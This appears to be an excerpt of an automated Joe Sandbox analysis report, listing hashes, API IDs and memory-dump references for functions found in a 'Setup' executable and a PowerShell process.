                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e9d8a715f4867a031d96218218279292efbbfaec0b26f01f49837f156af5202
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7681A331D0C246E5F7676E2BC2D0B79AA909F23B48FF85071C90DD229DEE5DA8419321
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                            • Opcode ID: cf2a363d9d9d60bb1fd2b7a7062aad5e5d6dc4d724fe27cc3b8d53810e30cd48
                                                                                                                                                                                                            • Instruction ID: 119f847cd9c8e22103ec47c39000db6f5f0cd03379d26cd29f2ef45a865b8f76
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf2a363d9d9d60bb1fd2b7a7062aad5e5d6dc4d724fe27cc3b8d53810e30cd48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A512C72F04152DAFB15EF66D5C19BCA761AB00399FF44235DE1E93AD5EF38A4018710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 72036449-0
                                                                                                                                                                                                            • Opcode ID: 287aa2f55fa63f36cf1cebc8650c9ead072f44a6b5d348b2231f5c0341a06890
                                                                                                                                                                                                            • Instruction ID: 9e979df13162c37056f672ed16d7aa086b9fc2c7478e3314bcbc13e9dbe63006
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 287aa2f55fa63f36cf1cebc8650c9ead072f44a6b5d348b2231f5c0341a06890
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F51B332F0D242E2F7A96D278689B7BF549AB40B14FBD4134CA4D762D5CA3CE840B671
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                            • Opcode ID: a45dab95f0394a49ead25b6af34a2d268b91debbe9157e6bb71821f7afc6c7d6
                                                                                                                                                                                                            • Instruction ID: 39e93ccf3df21a09a33144a296c25bc515f911852672e3ca3937c58d5d605955
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a45dab95f0394a49ead25b6af34a2d268b91debbe9157e6bb71821f7afc6c7d6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E518026E04641DAFB10EF72D4907BEB3A1BB48B58FA89035DE0D67749DF38D5419360
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: e+000$gfff
APIs
Strings
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
APIs
Strings
Similarity
• API ID: CurrentDirectory
• String ID: :
APIs
Strings
Similarity
• API ID: CompareStringtry_get_function
• String ID: CompareStringEx
APIs
Strings
Similarity
• API ID: Stringtry_get_function
• String ID: LCMapStringEx
APIs
Strings
Similarity
• API ID: wprintf
• String ID: Expanded wildcards: before: "%s" after : "%s"$_JAVA_LAUNCHER_DEBUG
APIs
Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 3215553584-336475711
                                                                                                                                                                                                            • Opcode ID: c1babc72da362b93fe99a1e6373bb2c622cae6ce3b5b9b1ac86d1823f73ca5e7
                                                                                                                                                                                                            • Instruction ID: cc22d389cce760b971ec31ba0a16c1c64a04eb3271130083585330d58fbbccf6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1babc72da362b93fe99a1e6373bb2c622cae6ce3b5b9b1ac86d1823f73ca5e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1801A22191C246D2F721BFA6E4D1A7EF3A0EF48304FE41135EA4E86795EF2CE1048A24
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF764A2BA8D
                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000030,00007FF764A2F5F4,?,?,00000000,00007FF764A2F8A9,?,?,00000000,00000000,00008000,00007FF764A29566), ref: 00007FF764A2BAA7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                            • API String ID: 539475747-3084827643
                                                                                                                                                                                                            • Opcode ID: 121c09a281781e80721105d7d94d03218607644482c6d9c5b1dc19ab7cdcd2aa
                                                                                                                                                                                                            • Instruction ID: 551caf39e4c37c72d0aae2075685dc34af284dc985ade5bd4a1ed1f4effb0258
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 121c09a281781e80721105d7d94d03218607644482c6d9c5b1dc19ab7cdcd2aa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79F05421A18641E2E645AF43E5808AAA221BF88B80FE84135E95D13B54DF3CE859D760
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF764A2BA31
                                                                                                                                                                                                            • TlsSetValue.KERNEL32(?,?,00000000,00007FF764A2CCB2,?,?,00000000,00007FF764A26825,?,?,?,?,00007FF764A2A502,?,?,00000001), ref: 00007FF764A2BA48
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Valuetry_get_function
                                                                                                                                                                                                            • String ID: FlsSetValue
                                                                                                                                                                                                            • API String ID: 738293619-3750699315
                                                                                                                                                                                                            • Opcode ID: 075e012088bc129b343f0eccdaf156853e335ef898808b6c750f3ffbbb915d4c
                                                                                                                                                                                                            • Instruction ID: 5833a85511acf15774f88d2212c1e022309816ee18bed5338744c8a475464884
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 075e012088bc129b343f0eccdaf156853e335ef898808b6c750f3ffbbb915d4c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2E06C61A1C542F3E6456F53F5C18F5A222AF48740FEC4135D91D16254DE3CE858D320
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2588036355.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_4ca0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: m^$m^$m^$m^$m^
                                                                                                                                                                                                            • API String ID: 0-393609038
                                                                                                                                                                                                            • Opcode ID: 33393c7a48986e39a9b360c931a97d541791fff4daceedbe6252437910e5a343
                                                                                                                                                                                                            • Instruction ID: 5a69a5f2b03007734cc2ec3bf4ca519ba535d157457ea651159c5f76f8c0b7b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33393c7a48986e39a9b360c931a97d541791fff4daceedbe6252437910e5a343
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C052F170A093868FC706CF6CC8A49AABFB1EF4A314B1945D6D484DB263C734EC55CBA5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2612717669.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_77e0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                            • API String ID: 0-1420252700
                                                                                                                                                                                                            • Opcode ID: a7790dc169526b0659d482a1475abe565643168f1e876078b75cebe42a282da5
                                                                                                                                                                                                            • Instruction ID: 5ba44cdc52728e5918f59558fbec248e1f121f67562c1eb00b7e2bc043e1a83c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7790dc169526b0659d482a1475abe565643168f1e876078b75cebe42a282da5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A41238B1B003499FCB159B6D881277ABBEAAFCA390F54887AD405CB351DB31CD45C792
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2612717669.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_77e0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fe6fe8e85e9bf8966ad3d185ab3c5437d66c9bef64368abcb3515bf18c574e3f
                                                                                                                                                                                                            • Instruction ID: e8631b39275d60db775d755974852fd8090e17358186d1e1f1f8bdcafab9a5a3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe6fe8e85e9bf8966ad3d185ab3c5437d66c9bef64368abcb3515bf18c574e3f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1341EBF1B0020ADFCB108F688503A7E7BE5BF892D4F5989A5D805DF251DB31D941C792
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2588036355.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_4ca0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6cdca27a68b39140a1438457cbae54c34fc6b8a4958c81d0f66f63899ebeac3e
                                                                                                                                                                                                            • Instruction ID: 4b19b0d8f6e43b6fcfad983aae802b94c65e6e46e1ccd5f646342d3f3bf34fd2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cdca27a68b39140a1438457cbae54c34fc6b8a4958c81d0f66f63899ebeac3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 664118B4A001069FCB09CF89C5959BAFBB2FF48314B11865AD505AB364C735FD50CFA4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2588036355.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_4ca0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: